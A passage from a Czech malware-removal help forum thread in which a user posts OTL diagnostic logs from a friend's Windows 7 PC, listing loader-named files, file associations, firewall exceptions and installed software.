[2013.02.20 17:28:38 | 000,072,638 | ---- | M] () -- \ProgramData\Skype\Apps\login\images\loader.gif
[2013.02.20 17:28:38 | 000,003,032 | ---- | M] () -- \ProgramData\Skype\Apps\login\images\loader.png
[2013.11.11 15:39:40 | 000,006,012 | ---- | M] () -- \ProgramData\Skype\Apps\login\images\normal\loader_15fps.gif
[2013.11.11 15:39:40 | 000,021,956 | ---- | M] () -- \ProgramData\Skype\Apps\login\images\normal\loader_30fps.gif
[2013.02.20 17:28:38 | 000,009,772 | ---- | M] () -- \ProgramData\Skype\Apps\login\images\retina\loader@2x.png
[2011.02.10 03:28:58 | 000,056,320 | ---- | M] () -- \TopCD\Metro simulátor\Bin\PhysXLoader.dll
[2014.07.21 09:58:44 | 000,001,980 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0DETKUZM\AdLoader[2].htm
[2014.07.21 09:58:44 | 000,017,912 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5Z3DNYFZ\AdLoader-3b8e790904fffcf74f96367cd382e261.min[1].js
[2014.07.22 21:17:20 | 000,001,021 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\EMMVAOG2\icon_loader[1].png
[2014.07.23 09:11:23 | 000,002,902 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\J50GLFEW\loader.17e9b4eca3c4dbbcb5be44b22660bdb3[1].gif
[2014.07.23 09:10:52 | 000,002,545 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\J50GLFEW\loader[1].gif
[2014.07.23 09:05:21 | 000,001,849 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SC540W1M\loader_small[1].gif
[2014.07.23 09:01:41 | 000,002,545 | ---- | M] () -- \Users\2014\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VHCGVFKI\ajax-loader[1].gif
[2013.04.15 13:32:10 | 000,060,416 | ---- | M] () -- \Users\2014\AppData\Roaming\Seznam.cz\bin\23890libfoxloader-x64.dll
[2013.03.29 13:37:34 | 000,059,384 | ---- | M] () -- \Users\2014\AppData\Roaming\Seznam.cz\bin\23890libfoxloader.dll
[2014.06.09 17:54:48 | 000,000,165 | ---- | M] () -- \Users\2014\AppData\Roaming\Seznam.cz\conf\szndesktop.d\libfoxloader.conf
[2013.03.25 16:27:20 | 000,000,665 | ---- | M] () -- \Users\2014\AppData\Roaming\Seznam.cz\uninstall\cz_seznam_software_libfoxloader_3_1_2.install.bat
[2013.03.25 16:27:26 | 000,000,117 | ---- | M] () -- \Users\2014\AppData\Roaming\Seznam.cz\uninstall\cz_seznam_software_libfoxloader_3_1_2.uninstall.bat
[2014.07.10 15:49:36 | 000,001,127 | ---- | M] () -- \Users\All Users\Microsoft\Windows\Start Menu\Programs\YouTUBE (TM) movie downloader\Uninstall YouTUBE (TM) movie downloader.lnk
[2014.07.10 15:49:35 | 000,001,147 | ---- | M] () -- \Users\All Users\Microsoft\Windows\Start Menu\Programs\YouTUBE (TM) movie downloader\YouTubeDownloader.lnk
[2013.02.20 17:28:38 | 000,072,638 | ---- | M] () -- \Users\All Users\Skype\Apps\login\images\loader.gif
[2013.02.20 17:28:38 | 000,003,032 | ---- | M] () -- \Users\All Users\Skype\Apps\login\images\loader.png
[2013.11.11 15:39:40 | 000,006,012 | ---- | M] () -- \Users\All Users\Skype\Apps\login\images\normal\loader_15fps.gif
[2013.11.11 15:39:40 | 000,021,956 | ---- | M] () -- \Users\All Users\Skype\Apps\login\images\normal\loader_30fps.gif
[2013.02.20 17:28:38 | 000,009,772 | ---- | M] () -- \Users\All Users\Skype\Apps\login\images\retina\loader@2x.png
[2010.03.24 21:35:48 | 000,018,264 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\FL_VSTOLoaderUI_dll_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2010.03.24 21:12:34 | 000,018,264 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\FL_VSTOLoaderUI_dll_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2010.10.07 05:36:40 | 000,018,264 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\FL_VSTOLoaderUI_dll_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8.923C1899_09AE_418B_B39D_A7A9EB6A7951
[2010.03.24 21:35:48 | 000,370,512 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\VSTOLoader_dll_amd64.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2010.03.24 21:12:34 | 000,249,680 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\VSTOLoader_dll_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2010.10.07 05:36:40 | 000,265,552 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.4763\VSTOLoader_dll_x86.3643236F_FC70_11D3_A536_0090278A1BB8.923C1899_09AE_418B_B39D_A7A9EB6A7951
[2013.03.09 08:17:04 | 000,019,080 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.7015\FL_VSTOLoaderUI_dll_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2013.03.09 08:17:04 | 000,268,440 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\00004109A20000000100000000F01FEC\14.0.7015\VSTOLoader_dll_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25
[2013.08.02 03:48:15 | 000,003,584 | -H-- | M] () -- \Windows\System32\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 03:15:12 | 000,038,400 | ---- | M] () -- \Windows\System32\dmloader.dll
[2013.08.02 03:48:15 | 000,003,584 | -H-- | M] () -- \Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 03:15:12 | 000,038,400 | ---- | M] () -- \Windows\SysWOW64\dmloader.dll
[2009.07.14 03:40:31 | 000,047,616 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_a1e90d98a953d601\dmloader.dll
[2009.07.14 03:24:53 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_66a6e19d9580f9e3\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:36:23 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17617_none_68daf829926cc6a9\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:37:53 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17932_none_68c05c919281774d\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.04 19:38:48 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17965_none_68a2edab92971725\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.11.30 07:38:44 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.18015_none_68d8d569926ebeb2\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.02 04:12:19 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.18229_none_68d20a7192733a4d\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:36:23 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.21728_none_695ac552ab919bbb\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:37:53 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22091_none_6907efc6abd0db81\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.04 19:35:00 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22125_none_6957a248ab947a6d\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.11.30 07:39:37 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22177_none_69239340abbb38d0\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.02 08:20:45 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22411_none_695e76beab8ff095\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.29 04:18:31 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22436_none_694dd858ab9ba72a\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.04 13:03:17 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22616_none_69637bfcab8b6996\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.04.12 04:28:21 | 000,003,584 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22653_none_69353b6eabae8d55\api-ms-win-core-libraryloader-l1-1-0.dll
[2011.04.12 10:34:35 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2011.04.12 10:34:35 | 000,033,360 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.efi.mui_35ee487d
[2011.04.12 10:34:35 | 000,034,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.exe.mui_3bc5b827
[2011.04.12 10:34:35 | 000,029,776 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.efi.mui_f412814e
[2011.04.12 10:34:35 | 000,030,288 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.exe.mui_ff8b5358
[2014.03.25 12:59:32 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb.manifest
[2014.03.25 12:59:32 | 000,642,944 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb_winload.efi_75834aa0
[2014.03.25 12:59:32 | 000,605,552 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb_winload.exe_75835076
[2014.03.25 12:59:32 | 000,566,208 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb_winresume.efi_85cd069f
[2014.03.25 12:59:32 | 000,518,672 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb_winresume.exe_85cd1215
[2009.07.14 04:57:50 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 04:57:50 | 000,019,008 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59_spldr.sys_98bd87a0
[2011.04.12 10:33:23 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2010.11.21 05:16:35 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17514_none_b94cbfa183466a89.manifest
[2011.02.05 19:34:23 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb.manifest
[2011.02.05 15:09:57 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.21655_none_b9ac1d069c83936e.manifest
[2009.07.14 04:18:27 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 03:15:12 | 000,038,400 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_45ca7214f0f664cb\dmloader.dll
[2009.07.14 03:03:49 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_0a884619dd2388ad\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:36:23 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17617_none_0cbc5ca5da0f5573\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:37:53 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17932_none_0ca1c10dda240617\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.04 18:40:37 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.17965_none_0c845227da39a5ef\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.11.30 06:45:15 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.18015_none_0cba39e5da114d7c\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.02 03:48:15 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.18229_none_0cb36eedda15c917\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:36:23 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.21728_none_0d3c29cef3342a85\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.25 13:37:53 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22091_none_0ce95442f3736a4b\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.04 18:29:45 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22125_none_0d3906c4f3370937\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.11.30 06:46:37 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22177_none_0d04f7bcf35dc79a\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.02 07:53:29 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22411_none_0d3fdb3af3327f5f\api-ms-win-core-libraryloader-l1-1-0.dll
[2013.08.29 03:54:48 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22436_none_0d2f3cd4f33e35f4\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.03.04 12:35:49 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22616_none_0d44e078f32df860\api-ms-win-core-libraryloader-l1-1-0.dll
[2014.04.12 04:03:37 | 000,003,584 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7601.22653_none_0d169feaf3511c1f\api-ms-win-core-libraryloader-l1-1-0.dll

< End of report >
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#8 Příspěvek od neumimvymysletjmeno »

teď extras.txt:

OTL Extras logfile created on: 23.7.2014 10:43:08 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2014\Desktop
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17126)
Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

3,86 Gb Total Physical Memory | 2,50 Gb Available Physical Memory | 64,93% Memory free
7,71 Gb Paging File | 6,16 Gb Available in Paging File | 79,88% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 117,09 Gb Total Space | 49,85 Gb Free Space | 42,57% Space Free | Partition Type: NTFS
Drive D: | 348,57 Gb Total Space | 348,23 Gb Free Space | 99,90% Space Free | Partition Type: NTFS

Computer Name: 2014-ASUS | User Name: Roland | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3695167739-365663555-3534380330-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)

========== Shell Spawning ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

========== Security Center Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

========== Authorized Applications List ==========


========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{529A051C-72F2-41B1-B78B-B304D30189BD}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\outlook.exe |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0461B0F6-4CAF-4C37-B50F-AFFBD3E271B4}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{15EE588F-5051-4938-8581-72FCAF9C994C}" = protocol=6 | dir=in | app=c:\users\2014\appdata\roaming\utorrent\utorrent.exe |
"{33C4FDEB-EAFC-48E3-8F9D-1F7D47A1632C}" = protocol=6 | dir=in | app=c:\users\2014\appdata\local\ilivid\ilivid.exe |
"{364A5F45-0E2C-4220-97FD-90D6051B4115}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\groove.exe |
"{4B33E150-EC24-4E09-B987-103D07C80094}" = protocol=17 | dir=in | app=c:\users\2014\appdata\roaming\utorrent\utorrent.exe |
"{7486DEB5-9977-483A-9D61-F3164412FDAF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{76D1646A-4E20-4876-A35E-9F4340346B57}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{8F2C8496-5ADA-4DCC-A7B5-8D58096FE777}" = protocol=6 | dir=in | app=c:\program files\pcdapp\sgm.exe |
"{9990FB67-09BF-488D-BF06-042043EC2CF0}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{A2EAF571-5CE5-4E74-976F-7136C578A13A}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\groove.exe |
"{A3001725-8AF3-4F65-BCD6-6E0499FDE1FB}" = protocol=17 | dir=in | app=c:\program files\pcdapp\sgm.exe |
"{B1B5A271-B9FC-4490-9A3B-776F97C8E7B4}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{BD5455B5-62BB-470A-BBC9-41571BED63EE}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{C39E1BBB-F26B-4769-91F3-7AC6BBD5DB72}" = protocol=6 | dir=in | app=c:\program files (x86)\deskshare\ip camera viewer 1.0\ip camera viewer.exe |
"{E33AAD3A-39D5-4A28-A3EA-D30572C4E2BB}" = protocol=17 | dir=in | app=c:\users\2014\appdata\local\ilivid\ilivid.exe |
"{EA8CA28B-9E42-479F-882F-9A9AC0370B25}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{EC503570-0596-46C7-A896-A77DC0F07D05}" = protocol=17 | dir=in | app=c:\program files (x86)\deskshare\ip camera viewer 1.0\ip camera viewer.exe |
"TCP Query User{5B91AD73-8285-4763-8E0E-F9BB69A25160}C:\program files\flatout2\flatout2.exe" = protocol=6 | dir=in | app=c:\program files\flatout2\flatout2.exe |
"TCP Query User{B49E7C49-7152-4BFA-BFB3-882D4C012348}C:\users\2014\desktop\dshutdown\dshutdown\rdshutdown.exe" = protocol=6 | dir=in | app=c:\users\2014\desktop\dshutdown\dshutdown\rdshutdown.exe |
"UDP Query User{7DA8A4ED-A73A-445A-8BF8-8C0D6783D7EE}C:\users\2014\desktop\dshutdown\dshutdown\rdshutdown.exe" = protocol=17 | dir=in | app=c:\users\2014\desktop\dshutdown\dshutdown\rdshutdown.exe |
"UDP Query User{AB476A27-9C1A-4D60-83F4-DB300C9835A7}C:\program files\flatout2\flatout2.exe" = protocol=17 | dir=in | app=c:\program files\flatout2\flatout2.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1364C748-A240-F0F3-490E-10C02357523E}" = ccc-utility64
"{1730D13B-7517-4321-A88B-64627CF67CDC}_is1" = Logon Screen
"{363836F9-D52D-8976-EC20-8C6965A4D045}" = ATI Catalyst Install Manager
"{503F672D-6C84-448A-8F8F-4BC35AC83441}" = AMD APP SDK Runtime
"{50813B8C-FCBB-3C61-8039-EAAA93029066}" = Microsoft .NET Framework 4.5.1 (CSY)
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010
